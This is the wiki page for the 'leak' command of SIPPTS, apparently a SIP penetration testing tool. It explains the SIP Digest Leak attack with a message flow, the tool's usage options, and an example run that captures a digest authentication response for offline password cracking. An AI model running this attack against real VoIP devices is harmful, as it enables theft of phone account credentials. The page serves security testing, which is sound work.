Skip to content

Command leak

Jump to bottom
Jose Luis Verdeguer edited this page Sep 18, 2024 · 2 revisions

SIPPS leak exploits the SIP Digest Leak vulnerability discovered by Sandro Gauci that affects a large number of hardware and software devices. The description of the vulnerability is here: https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf

The goal is to make a call to a telephone device (by a INVITE message). When in the other side someone answer the call, there will be no audio and then he or she will hang up. Then we will receive a BYE message. Next we will send a 407 proxy authentication required. If the telephone device is vulnerable, it will response with another BYE message that will include an authentication response.

Having the response we can try to obtain the password by a bruteforce attack on our local machine.

Script                                                         Phone
      ---> INVITE                                          ---> 
      <--- 100 Trying                                      <---
      <--- 180 Ringing                                     <---
      <--- 200 OK                                          <---
      ---> ACK                                             --->
      <--- BYE                                             <---
      ---> 407 Proxy Authentication Required (with digest) ---> 
      <--- BYE (with digest response)                      <---

Usage

$ sippts leak -h

Target:
  -i IP|HOST          Host/IP address/network (ex: mysipserver.com | 192.168.0.10 | 192.168.0.0/24)
  -f FILE             File with several IPs (format: ip:port/proto ... one per line)
  -r REMOTE_PORT      Remote port (default: 5060)
  -p PROTOCOL         Protocol: udp|tcp (default: udp)
  -proxy IP:PORT      Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)

Headers:
  -d DOMAIN           SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
  -cd CONTACT_DOMAIN  Domain or IP address for Contact header. Ex: 10.0.1.2
  -fn FROM_NAME       From Name. Ex: Bob
  -fu FROM_USER       From User (default: 100)
  -fd FROM_DOMAIN     From Domain. Ex: 10.0.0.1
  -tn TO_NAME         To Name. Ex: Alice
  -tu TO_USER         To User (default: 100)
  -td TO_DOMAIN       To Domain. Ex: 10.0.0.1
  -ua USER_AGENT      User-Agent header (default: pplsip)
  -ppi PPI            P-Preferred-Identity
  -pai PAI            P-Asserted-Identity
  -sdp                Send SDP in INVITE messages
  -sdes               Send SDES in SDP

Auth:
  -auth AUTH_MODE     Authentication mode [www|proxy] (default: www)
  -user AUTH_USER     Authentication user
  -pass AUTH_PASS     Authentication password

Log:
  -v                  Increase verbosity
  -o FILE             Save digest to file in SipCrack format
  -l FILE             Save result into a log file

Other options:
  -local-ip IP        Set local IP address (by default try to get it)
  -ping               Ping host before send attack
  -h, --help          Show this help

Example

$ sippts leak -i 192.168.2.235

[!] Target: 192.168.2.235:5060/UDP
[!] Caller: 100
[!] Callee: 100

[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
	... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok

Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@192.168.2.235:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
Clone this wiki locally